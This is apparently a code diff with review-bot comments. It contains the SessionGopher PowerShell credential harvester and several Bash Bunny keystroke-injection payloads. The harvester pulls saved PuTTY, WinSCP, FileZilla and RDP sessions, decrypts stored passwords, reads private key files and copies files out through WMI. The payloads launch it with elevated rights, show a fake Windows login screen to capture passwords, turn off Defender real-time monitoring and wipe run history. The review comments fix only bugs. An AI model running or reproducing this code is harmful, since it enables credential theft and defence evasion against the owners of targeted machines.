(ProcessThoroughRemote $FilePathsFound)
|
||||
|
||||
}
|
||||
|
||||
|
||||
# Check if the error is access denied.
|
||||
$ourerror = $error[0]
|
||||
if ($ourerror.Exception.Message.Contains("Access is denied.")) {
|
||||
Write-Warning "Access Denied on $RemoteComputer"
|
||||
} elseif ($ourerror.Exception.Message.Contains("The RPC server is unavailable.")) {
|
||||
Write-Warning "Cannot connect to $RemoteComputer. Is the host up and accepting RPC connections?"
|
||||
} else {
|
||||
Write-Debug "$($ourerror.Exception.Message)"
}
}
}# for each remote computer
# Else, we run SessionGopher locally
} else {

Write-Output "Digging on"(Hostname)"..."

# Aggregate all user hives in HKEY_USERS into a variable
$UserHives = Get-ChildItem Registry::HKEY_USERS\ -ErrorAction SilentlyContinue | Where-Object {$_.Name -match '^HKEY_USERS\\S-1-5-21-[\d\-]+$'}

# For each SID beginning in S-15-21-. Loops through each user hive in HKEY_USERS.
foreach($Hive in $UserHives) {

# Created for each user found. Contains all PuTTY, WinSCP, FileZilla, RDP information.
$UserObject = New-Object PSObject

$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfPPKFiles = New-Object System.Collections.ArrayList
$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
$ArrayOfRDPFiles = New-Object System.Collections.ArrayList
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList

$objUser = (GetMappedSID)
$Source = (Hostname) + "\" + (Split-Path $objUser.Value -Leaf)

$UserObject | Add-Member -MemberType NoteProperty -Name "Source" -Value $objUser.Value

# Construct PuTTY, WinSCP, RDP, FileZilla session paths from base key
$PuTTYPath = Join-Path $Hive.PSPath "\$PuTTYPathEnding"
$WinSCPPath = Join-Path $Hive.PSPath "\$WinSCPPathEnding"
$MicrosoftRDPPath = Join-Path $Hive.PSPath "\$RDPPathEnding"
$FileZillaPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\AppData\Roaming\FileZilla\sitemanager.xml"
$SuperPuTTYPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\Documents\SuperPuTTY\Sessions.xml"

if (Test-Path $FileZillaPath) {

[xml]$FileZillaXML = Get-Content $FileZillaPath
(ProcessFileZillaFile $FileZillaXML)

}

if (Test-Path $SuperPuTTYPath) {

[xml]$SuperPuTTYXML = Get-Content $SuperPuTTYPath
(ProcessSuperPuTTYFile $SuperPuTTYXML)

}

if (Test-Path $MicrosoftRDPPath) {

# Aggregates all saved sessions from that user's RDP client
$AllRDPSessions = Get-ChildItem $MicrosoftRDPPath

(ProcessRDPLocal $AllRDPSessions)

} # If (Test-Path MicrosoftRDPPath)

if (Test-Path $WinSCPPath) {

# Aggregates all saved sessions from that user's WinSCP client
$AllWinSCPSessions = Get-ChildItem $WinSCPPath

(ProcessWinSCPLocal $AllWinSCPSessions)

} # If (Test-Path WinSCPPath)

if (Test-Path $PuTTYPath) {

# Aggregates all saved sessions from that user's PuTTY client
$AllPuTTYSessions = Get-ChildItem $PuTTYPath

(ProcessPuTTYLocal $AllPuTTYSessions)

} # If (Test-Path PuTTYPath)

} # For each Hive in UserHives

# If run in Thorough Mode
if ($Everything) {

# Contains raw i-node data for files with extension .ppk, .rdp, and sdtid respectively, found by Get-ChildItem
$PPKExtensionFilesINodes = New-Object System.Collections.ArrayList
$RDPExtensionFilesINodes = New-Object System.Collections.ArrayList
$sdtidExtensionFilesINodes = New-Object System.Collections.ArrayList

# All drives found on system in one variable
$AllDrives = Get-PSDrive

(ProcessThoroughLocal $AllDrives)

(ProcessPPKFile $PPKExtensionFilesINodes)
(ProcessRDPFile $RDPExtensionFilesINodes)
(ProcesssdtidFile $sdtidExtensionFilesINodes)

} # If Thorough

} # Else -- run SessionGopher locally

} # Invoke-SessionGopher

####################################################################################
####################################################################################
## Registry Querying Helper Functions
####################################################################################
####################################################################################

# Maps the SID from HKEY_USERS to a username through the HKEY_LOCAL_MACHINE hive
function GetMappedSID {

# If getting SID from remote computer
if ($Inputlist -or $ComputerName -or $AllDomain) {
# Get the username for SID we discovered has saved sessions
$SIDPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$SID"
$Value = "ProfileImagePath"

(Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM,$SIDPath,$Value @optionalCreds).sValue
# Else, get local SIDs
} else {
# Converts user SID in HKEY_USERS to username
$SID = (Split-Path $Hive.Name -Leaf)
$objSID = New-Object System.Security.Principal.SecurityIdentifier("$SID")
$objSID.Translate( [System.Security.Principal.NTAccount])
}

}

function DownloadAndExtractFromRemoteRegistry($File) {
# The following code is taken from Christopher Truncer's WMIOps script on GitHub. It gets file contents through WMI by
# downloading the file's contents to the remote computer's registry, and then extracting the value from that registry location
$fullregistrypath = "HKLM:\Software\Microsoft\DRM"
$registrydownname = "ReadMe"
$regpath = "SOFTWARE\Microsoft\DRM"

# On remote system, save file to registry
Write-Verbose "Reading remote file and writing on remote registry"
$remote_command = '$fct = Get-Content -Encoding byte -Path ''' + "$File" + '''; $fctenc = [System.Convert]::ToBase64String($fct); New-ItemProperty -Path ' + "'$fullregistrypath'" + ' -Name ' + "'$registrydownname'" + ' -Value $fctenc -PropertyType String -Force'
$remote_command = 'powershell -nop -exec bypass -c "' + $remote_command + '"'

$null = Invoke-WmiMethod -class win32_process -Name Create -Argumentlist $remote_command -ComputerName $RemoteComputer @optionalCreds

# Sleeping to let remote system read and store file
Start-Sleep -s 15

$remote_reg = ""

# Grab file from remote system's registry
$remote_reg = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM, $regpath, $registrydownname -Computer $RemoteComputer @optionalCreds

$decoded = [System.Convert]::FromBase64String($remote_reg.sValue)
$UTF8decoded = [System.Text.Encoding]::UTF8.GetString($decoded)

# Removing Registry value from remote system
$null = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'DeleteValue' -Argumentlist $reghive, $regpath, $registrydownname -ComputerName $RemoteComputer @optionalCreds

$UTF8decoded

}

####################################################################################
####################################################################################
## File Processing Helper Functions
####################################################################################
####################################################################################

function ProcessThoroughLocal($AllDrives) {

foreach ($Drive in $AllDrives) {
# If the drive holds a filesystem
if ($Drive.Provider.Name -eq "FileSystem") {
$Dirs = Get-ChildItem $Drive.Root -Recurse -ErrorAction SilentlyContinue
foreach ($Dir in $Dirs) {
Switch ($Dir.Extension) {
".ppk" {[void]$PPKExtensionFilesINodes.Add($Dir)}
".rdp" {[void]$RDPExtensionFilesINodes.Add($Dir)}
".sdtid" {[void]$sdtidExtensionFilesINodes.Add($Dir)}
}
}
}
}

}

function ProcessThoroughRemote($FilePathsFound) {

foreach ($FilePath in $FilePathsFound) {
# Each object we create for the file extension found from a -Thorough search will have the same properties (Source, Path to File)
$EverythingObject = "" | Select-Object -Property Source,Path
$EverythingObject.Source = $RemoteComputer

$Extension = [IO.Path]::GetExtension($FilePath.Name)

if ($Extension -eq ".ppk") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofPPKFiles.Add($EverythingObject)
} elseif ($Extension -eq ".rdp") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofRDPFiles.Add($EverythingObject)
} elseif ($Extension -eq ".sdtid") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofsdtidFiles.Add($EverythingObject)
}

}

if ($ArrayOfPPKFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfRDPFiles

if ($OutCSV) {
$ArrayOfPPKFiles | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Private Key Files (.ppk)"
$ArrayOfPPKFiles | Format-List | Out-String
}
}

if ($ArrayOfRDPFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles

if ($OutCSV) {
$ArrayOfRDPFiles | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
} else {
Write-Output "Microsoft RDP Connection Files (.rdp)"
$ArrayOfRDPFiles | Format-List | Out-String
}
}
if ($ArrayOfsdtidFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles

if ($OutCSV) {
$ArrayOfsdtidFiles | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
} else {
Write-Output "RSA Tokens (sdtid)"
$ArrayOfsdtidFiles | Format-List | Out-String
}

}

} # ProcessThoroughRemote

function ProcessPuTTYLocal($AllPuTTYSessions) {

# For each PuTTY saved session, extract the information we want
foreach($Session in $AllPuTTYSessions) {

$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname

$PuTTYSessionObject.Source = $Source
$PuTTYSessionObject.Session = (Split-Path $Session -Leaf)
$PuTTYSessionObject.Hostname = ((Get-ItemProperty -Path ("Microsoft.PowerShell.Core\Registry::" + $Session) -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)

# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)

}

if ($OutCSV) {
$ArrayOfPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Sessions"
$ArrayOfPuTTYSessions | Format-List | Out-String
}

# Add the array of PuTTY session objects to UserObject
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions

} # ProcessPuTTYLocal

function ProcessRDPLocal($AllRDPSessions) {

# For each RDP saved session, extract the information we want
foreach($Session in $AllRDPSessions) {

$PathToRDPSession = "Microsoft.PowerShell.Core\Registry::" + $Session

$MicrosoftRDPSessionObject = "" | Select-Object -Property Source,Hostname,Username

$MicrosoftRDPSessionObject.Source = $Source
$MicrosoftRDPSessionObject.Hostname = (Split-Path $Session -Leaf)
$MicrosoftRDPSessionObject.Username = ((Get-ItemProperty -Path $PathToRDPSession -Name "UsernameHint" -ErrorAction SilentlyContinue).UsernameHint)

# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfRDPSessions.Add($MicrosoftRDPSessionObject)

} # For each Session in AllRDPSessions

if ($OutCSV) {
$ArrayOfRDPSessions | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
} else {
Write-Output "Microsoft Remote Desktop (RDP) Sessions"
$ArrayOfRDPSessions | Format-List | Out-String
}

# Add the array of RDP session objects to UserObject
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions

} #ProcessRDPLocal

function ProcessWinSCPLocal($AllWinSCPSessions) {

# For each WinSCP saved session, extract the information we want
foreach($Session in $AllWinSCPSessions) {

$PathToWinSCPSession = "Microsoft.PowerShell.Core\Registry::" + $Session

$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password

$WinSCPSessionObject.Source = $Source
$WinSCPSessionObject.Session = (Split-Path $Session -Leaf)
$WinSCPSessionObject.Hostname = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)
$WinSCPSessionObject.Username = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Username" -ErrorAction SilentlyContinue).Username)
$WinSCPSessionObject.Password = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Password" -ErrorAction SilentlyContinue).Password)

if ($WinSCPSessionObject.Password) {
$MasterPassUsed = ((Get-ItemProperty -Path (Join-Path $Hive.PSPath "SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Security") -Name "UseMasterPassword" -ErrorAction SilentlyContinue).UseMasterPassword)

# If the user is not using a master password, we can crack it:
if (!$MasterPassUsed) {
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
# Else, the user is using a master password. We can't retrieve plaintext credentials for it.
} else {
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
}
}

# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)

} # For each Session in AllWinSCPSessions

if ($OutCSV) {
$ArrayOfWinSCPSessions | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
} else {
Write-Output "WinSCP Sessions"
$ArrayOfWinSCPSessions | Format-List | Out-String
}

# Add the array of WinSCP session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions

} # ProcessWinSCPLocal

function ProcesssdtidFile($sdtidExtensionFilesINodes) {

foreach ($Path in $sdtidExtensionFilesINodes.VersionInfo.FileName) {

$sdtidFileObject = "" | Select-Object -Property "Source","Path"

$sdtidFileObject."Source" = $Source
$sdtidFileObject."Path" = $Path

[void]$ArrayOfsdtidFiles.Add($sdtidFileObject)

}

if ($ArrayOfsdtidFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles

if ($OutCSV) {
$ArrayOfsdtidFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
} else {
Write-Output "RSA Tokens (sdtid)"
$ArrayOfsdtidFiles | Select-Object * | Format-List | Out-String
}

}

} # Process sdtid File

function ProcessRDPFile($RDPExtensionFilesINodes) {

# Extracting the filepath from the i-node information stored in RDPExtensionFilesINodes
foreach ($Path in $RDPExtensionFilesINodes.VersionInfo.FileName) {

$RDPFileObject = "" | Select-Object -Property "Source","Path","Hostname","Gateway","Prompts for Credentials","Administrative Session"

$RDPFileObject."Source" = (Hostname)

# The next several lines use regex pattern matching to store relevant info from the .rdp file into our object
$RDPFileObject."Path" = $Path
$RDPFileObject."Hostname" = try { (Select-String -Path $Path -Pattern "full address:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Gateway" = try { (Select-String -Path $Path -Pattern "gatewayhostname:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Administrative Session" = try { (Select-String -Path $Path -Pattern "administrative session:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Prompts for Credentials" = try { (Select-String -Path $Path -Pattern "prompt for credentials:[a-z]:(.*)").Matches.Groups[1].Value } catch {}

if (!$RDPFileObject."Administrative Session" -or !$RDPFileObject."Administrative Session" -eq 0) {
$RDPFileObject."Administrative Session" = "Does not connect to admin session on remote host"
} else {
$RDPFileObject."Administrative Session" = "Connects to admin session on remote host"
}
if (!$RDPFileObject."Prompts for Credentials" -or $RDPFileObject."Prompts for Credentials" -eq 0) {
$RDPFileObject."Prompts for Credentials" = "No"
} else {
$RDPFileObject."Prompts for Credentials" = "Yes"
}

[void]$ArrayOfRDPFiles.Add($RDPFileObject)

}

if ($ArrayOfRDPFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles

if ($OutCSV) {
$ArrayOfRDPFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
} else {
Write-Output "Microsoft RDP Connection Files (.rdp)"
$ArrayOfRDPFiles | Select-Object * | Format-List | Out-String
}

}

} # Process RDP File

function ProcessPPKFile($PPKExtensionFilesINodes) {

# Extracting the filepath from the i-node information stored in PPKExtensionFilesINodes
foreach ($Path in $PPKExtensionFilesINodes.VersionInfo.FileName) {

# Private Key Encryption property identifies whether the private key in this file is encrypted or if it can be used as is
$PPKFileObject = "" | Select-Object -Property "Source","Path","Protocol","Comment","Private Key Encryption","Private Key","Private MAC"

$PPKFileObject."Source" = (Hostname)

# The next several lines use regex pattern matching to store relevant info from the .ppk file into our object
$PPKFileObject."Path" = $Path

$PPKFileObject."Protocol" = try { (Select-String -Path $Path -Pattern ": (.*)" -Context 0,0).Matches.Groups[1].Value } catch {}
$PPKFileObject."Private Key Encryption" = try { (Select-String -Path $Path -Pattern "Encryption: (.*)").Matches.Groups[1].Value } catch {}
$PPKFileObject."Comment" = try { (Select-String -Path $Path -Pattern "Comment: (.*)").Matches.Groups[1].Value } catch {}
$NumberOfPrivateKeyLines = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)").Matches.Groups[1].Value } catch {}
$PPKFileObject."Private Key" = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)" -Context 0,$NumberOfPrivateKeyLines).Context.PostContext -Join "" } catch {}
$PPKFileObject."Private MAC" = try { (Select-String -Path $Path -Pattern "Private-MAC: (.*)").Matches.Groups[1].Value } catch {}

# Add the object we just created to the array of .ppk file objects
[void]$ArrayOfPPKFiles.Add($PPKFileObject)

}

if ($ArrayOfPPKFiles.count -gt 0) {

$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfPPKFiles

if ($OutCSV) {
$ArrayOfPPKFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Private Key Files (.ppk)"
$ArrayOfPPKFiles | Select-Object * | Format-List | Out-String
}

}

} # Process PPK File

function ProcessFileZillaFile($FileZillaXML) {

# Locate all <Server> nodes (aka session nodes), iterate over them
foreach($FileZillaSession in $FileZillaXML.SelectNodes('//FileZilla3/Servers/Server')) {
# Hashtable to store each session's data
$FileZillaSessionHash = @{}

# Iterates over each child node under <Server> (aka session)
$FileZillaSession.ChildNodes | ForEach-Object {

$FileZillaSessionHash["Source"] = $Source
# If value exists, make a key-value pair for it in the hash table
if ($_.InnerText) {
if ($_.Name -eq "Pass") {
$FileZillaSessionHash["Password"] = $_.InnerText
} else {
# Populate session data based on the node name
$FileZillaSessionHash[$_.Name] = $_.InnerText
}

}

}

# Create object from collected data, excluding some trivial information
[void]$ArrayOfFileZillaSessions.Add((New-Object PSObject -Property $FileZillaSessionHash | Select-Object -Property * -ExcludeProperty "#text",LogonType,Type,BypassProxy,SyncBrowsing,PasvMode,DirectoryComparison,MaximumMultipleConnections,EncodingType,TimezoneOffset,Colour))

} # ForEach FileZillaSession in FileZillaXML.SelectNodes()

# base64_decode the stored encoded session passwords, and decode protocol
foreach ($Session in $ArrayOfFileZillaSessions) {
$Session.Password = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Session.Password))
if ($Session.Protocol -eq "0") {
$Session.Protocol = "Use FTP over TLS if available"
} elseif ($Session.Protocol -eq 1) {
$Session.Protocol = "Use SFTP"
} elseif ($Session.Protocol -eq 3) {
$Session.Protocol = "Require implicit FTP over TLS"
} elseif ($Session.Protocol -eq 4) {
$Session.Protocol = "Require explicit FTP over TLS"
} elseif ($Session.Protocol -eq 6) {
$Session.Protocol = "Only use plain FTP (insecure)"
}
}

if ($OutCSV) {
$ArrayOfFileZillaSessions | Export-CSV -Append -Path ($OutputDirectory + "\FileZilla.csv") -NoTypeInformation
} else {
Write-Output "FileZilla Sessions"
$ArrayOfFileZillaSessions | Format-List | Out-String
}

# Add the array of FileZilla session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "FileZilla Sessions" -Value $ArrayOfFileZillaSessions

} # ProcessFileZillaFile

function ProcessSuperPuTTYFile($SuperPuTTYXML) {

foreach($SuperPuTTYSessions in $SuperPuTTYXML.ArrayOfSessionData.SessionData) {

foreach ($SuperPuTTYSession in $SuperPuTTYSessions) {
if ($SuperPuTTYSession -ne $null) {

$SuperPuTTYSessionObject = "" | Select-Object -Property "Source","SessionId","SessionName","Host","Username","ExtraArgs","Port","Putty Session"

$SuperPuTTYSessionObject."Source" = $Source
$SuperPuTTYSessionObject."SessionId" = $SuperPuTTYSession.SessionId
$SuperPuTTYSessionObject."SessionName" = $SuperPuTTYSession.SessionName
$SuperPuTTYSessionObject."Host" = $SuperPuTTYSession.Host
$SuperPuTTYSessionObject."Username" = $SuperPuTTYSession.Username
$SuperPuTTYSessionObject."ExtraArgs" = $SuperPuTTYSession.ExtraArgs
$SuperPuTTYSessionObject."Port" = $SuperPuTTYSession.Port
$SuperPuTTYSessionObject."PuTTY Session" = $SuperPuTTYSession.PuttySession

[void]$ArrayOfSuperPuTTYSessions.Add($SuperPuTTYSessionObject)
}
}

} # ForEach SuperPuTTYSessions

if ($OutCSV) {
$ArrayOfSuperPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\SuperPuTTY.csv") -NoTypeInformation
} else {
Write-Output "SuperPuTTY Sessions"
$ArrayOfSuperPuTTYSessions | Out-String
}

# Add the array of SuperPuTTY session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "SuperPuTTY Sessions" -Value $ArrayOfSuperPuTTYSessions

} # ProcessSuperPuTTYFile

####################################################################################
####################################################################################
## WinSCP Deobfuscation Helper Functions
####################################################################################
####################################################################################

# Gets all domain-joined computer names and properties in one object
function GetComputersFromActiveDirectory {

$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
if ($ExcludeDC) {
Write-Verbose "Skipping enumeration against the Domain Controller(s) for stealth."
$Filter = "(&(objectCategory=computer)(!userAccountControl:1.2.840.113556.1.4.803:=8192))"
} else {
$Filter = "(objectCategory=computer)"
}

$objSearcher.Filter = $Filter

$colProplist = "name"

foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}

$objSearcher.FindAll()

}

function DecryptNextCharacterWinSCP($remainingPass) {

# Creates an object with flag and remainingPass properties
$flagAndPass = "" | Select-Object -Property flag,remainingPass

# Shift left 4 bits equivalent for backwards compatibility with older PowerShell versions
$firstval = ("0123456789ABCDEF".indexOf($remainingPass[0]) * 16)
$secondval = "0123456789ABCDEF".indexOf($remainingPass[1])

$Added = $firstval + $secondval

$decryptedResult = (((-bnot ($Added -bxor $Magic)) % 256) + 256) % 256

$flagAndPass.flag = $decryptedResult
$flagAndPass.remainingPass = $remainingPass.Substring(2)

$flagAndPass

}

function DecryptWinSCPPassword($SessionHostname, $SessionUsername, $Password) {

$CheckFlag = 255
$Magic = 163

$len = 0
$key = $SessionHostname + $SessionUsername
$values = DecryptNextCharacterWinSCP($Password)

$storedFlag = $values.flag

if ($values.flag -eq $CheckFlag) {
$values.remainingPass = $values.remainingPass.Substring(2)
$values = DecryptNextCharacterWinSCP($values.remainingPass)
}

$len = $values.flag

$values = DecryptNextCharacterWinSCP($values.remainingPass)
$values.remainingPass = $values.remainingPass.Substring(($values.flag * 2))

$finalOutput = ""
for ($i=0; $i -lt $len; $i++) {
$values = (DecryptNextCharacterWinSCP($values.remainingPass))
$finalOutput += [char]$values.flag
}

if ($storedFlag -eq $CheckFlag) {
$finalOutput.Substring($key.length)
}

$finalOutput
}
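Review bot: ProcessThoroughRemote attaches the wrong list under the `PPK Files` property: `$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfRDPFiles` sits inside `if ($ArrayOfPPKFiles.count -gt 0)` and should pass `$ArrayOfPPKFiles`, as ProcessPPKFile does further down. In the same region, `$ArrayOfsdtidFiles` is appended to by ProcessThoroughRemote and ProcesssdtidFile but is never created next to the other `System.Collections.ArrayList` instances in the local branch shown here, so every `.Add()` on it raises a method-on-null error. DownloadAndExtractFromRemoteRegistry reads the value with `$HKLM` but deletes it with `$reghive`, which is assigned nowhere in this hunk, so the `DeleteValue` call fails and the base64 copy of the file stays in the remote `HKLM\Software\Microsoft\DRM` `ReadMe` value. Two smaller points: `if (!$RDPFileObject."Administrative Session" -or !$RDPFileObject."Administrative Session" -eq 0)` negates the value before the `-eq 0` comparison (the `Prompts for Credentials` check directly below has the intended form), and the `## WinSCP Deobfuscation Helper Functions` banner sits above GetComputersFromActiveDirectory, which belongs with the registry and AD query helpers.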
@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: SessionBunny
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

LED SETUP

Q DELAY 500

GET SWITCH_POSITION
DUCKY_LANG de

Q DELAY 500

ATTACKMODE HID STORAGE

#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING

LED STAGE1

Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 500

Q DELAY 1000
Q STRING "powershell -exec bypass"
Q DELAY 500
Q ENTER
Q DELAY 250
Q STRING "Import-Module((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\SessionBunny.ps1')"
Q DELAY 250
Q ENTER
Q DELAY 250
Q STRING "Invoke-SessionBunny -Everything"
Q DELAY 250
Q ENTER

LED FINISH

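Review bot: the payload imports `SessionBunny.ps1` and then types `Invoke-SessionBunny -Everything`, but the PowerShell module in the hunk above closes with `} # Invoke-SessionGopher`; unless the function was renamed inside the .ps1, this call ends with a command-not-found error, so the two names need to agree. The header also lacks the `# Description:` and `# Target:` lines the other payloads in this change carry, and nothing documents that `DUCKY_LANG de` and the `Q ALT j` keystroke sent after `Start-Process powershell -Verb runAs` assume a German keyboard layout and locale.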
@@ -0,0 +1,22 @@
# Title: Fake Login
# Description: Shows a fake login screen
# Author: Cribbit
# Version: 1.0
# Category: Credentials
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

QUACK DELAY 500

LED ATTACK

RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"

LED FINISH

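Review bot: the header's `# Target: Windows (Powershell 5.1+)` disagrees with the README's `Target: Windows 10 (Powershell 5.1+)`; pick one. The `RUN WIN` line dot-sources `L.ps1` from `payloads\$SWITCH_POSITION`, yet the README never names that file even though its Config section tells readers to edit the image loading inside it; the README should state which script is run and that it is loaded with `-W h -EP Bypass`.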
@@ -0,0 +1,45 @@
# Fake Login
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Credentials
- Attackmode: HID & Storage
- Extensions: Run
- Props: PanicAcid for testing multi-screen desktops, Foxtrot and Other Hak5 Discord members

## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |

## Description
Shows a fake login screen. Saves the entered value to the loots folder on the bunny.

## Config
This payload contains 9 base64 encode images.
If you do not wish to use them you could have the files on the bunny and do something like this:
```powershell
$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
```
or if you have web hosting or a http server running on the bunny then you can do something like:
```powershell
$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg';
$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);
```

## To Do
Adding a To Do section just in case someone (or me if I can be bothered) want to fix some issues:

- Fade between time panel 1 and login panel 2
- The beginnings of the code are there but has too much noticeable flicker.
- Disable notifications as they display over the form:
- HKEY\_LOCAL\_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Explorer, this Explorer needs to be created, Dword32 “DisableNotificationCenter”, value as 1.
- HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications, "ToastEnabled" DWORD 0 = Turn off
- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.AutoPlay, "Enabled" = 0

## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |

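Review bot: the first Config snippet, `[System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");`, is not valid PowerShell as written; `<PathToBunny>` has to be a variable joined to the file name, for example `FromFile((Join-Path $BunnyPath 'bg.jpg'))`, otherwise anyone copying it gets a parse error. The Description should also name the file the entered value is written to under the loot folder, and the To Do list switches between `HKEY_CURRENT_USER` and `HKCU` for the same hive; use one form.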
@@ -0,0 +1,38 @@
DELAY 5000
GUI d
DELAY 1200
GUI r
DELAY 1200
STRING powershell -nologo -noni -ep bypass
CTRL-SHIFT ENTER
DELAY 2000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING mode con:cols=100 lines=1
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
ENTER
DELAY 200
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
ENTER
DELAY 35000
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
ENTER
DELAY 1000
STRING echo "Successful PWNd..."
ENTER
DELAY 1000
STRING eject
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
DELAY 1000
STRING exit
ENTER

